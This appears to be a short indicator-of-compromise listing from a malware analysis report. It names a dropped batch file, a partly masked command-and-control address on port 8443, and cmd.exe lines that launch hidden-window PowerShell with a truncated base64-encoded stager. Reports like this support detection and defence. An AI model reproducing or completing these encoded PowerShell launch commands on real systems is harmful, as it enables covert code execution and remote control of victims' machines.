Technical Information
- %TEMP%\6a18.tmp\dorit.bat
- %TEMP%\6a18.tmp\dorit.bat
- '77.##9.236.197':8443
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\6A18.tmp\dorit.bat" "<Full path to file>""' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\6A18.tmp\dorit.bat" "<Full path to file>""
- '%WINDIR%\syswow64\cmd.exe' /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACc...